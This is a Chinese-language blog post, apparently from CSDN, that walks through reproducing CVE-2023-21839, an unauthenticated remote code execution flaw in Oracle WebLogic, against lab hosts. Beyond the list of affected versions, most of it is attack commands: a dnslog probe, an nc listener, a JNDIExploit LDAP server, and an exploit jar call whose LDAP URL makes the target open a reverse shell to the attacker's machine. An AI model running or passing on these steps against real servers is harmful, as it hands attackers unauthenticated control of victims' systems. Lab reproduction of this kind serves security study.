CVE-2023-21839 weblogic rce漏洞复现

CSDN 2024-07-06 09:33:05 阅读 50

文章目录

一、漏洞影响版本二、漏洞验证三、启动反弹shell监听切换路径到jdk1.8

四、启动ldap服务五、使用CVE-2023-21839工具来进行攻击测试六、反弹shell

一、漏洞影响版本

CVE-2023-21839是Weblogic产品中的远程代码执行漏洞,由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功可能会导致Oracle Weblogic服务器被控制,远程注入操作系统命令或代码。

Weblogic 12.2.1.3.0

Weblogic 12.2.1.4.0

Weblogic 14.1.1.0.0

二、漏洞验证

http://192.168.232.131:7001/console/login/LoginForm.jsp

在这里插入图片描述

java -jar Weblogic-CVE-2023-21839.jar 192.168.232.131:7001 ldap://m08q4j.dnslog.cn/test

执行以上命令可以在dnslog上获得回显,即可验证可能存在该漏洞

在这里插入图片描述

三、启动反弹shell监听

nc -lvp 2000

在这里插入图片描述

切换路径到jdk1.8

复现之前请务必切换路径到jdk路径下

四、启动ldap服务

C:\Program Files\Java\jdk1.8.0_181\bin>java -jar G:\资料\vulhub复现\weblogic\可行工具\JNDIExploit.v1.2\JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.180.2

在这里插入图片描述

五、使用CVE-2023-21839工具来进行攻击测试

C:\Program Files\Java\jdk1.8.0_181\bin>java -jar G:\资料\vulhub复现\weblogic\可行工具\Weblogic-CVE-2023-21839.jar 192.168.232.131:7001 ldap://192.168.180.2:1389/Basic/ReverseShell/192.168.180.2/2000

在这里插入图片描述

六、反弹shell

在这里插入图片描述



声明

本文内容仅代表作者观点,或转载于其他网站,本站不以此文作为商业用途
如有涉及侵权,请联系本站进行删除
转载本站原创文章,请注明来源及作者。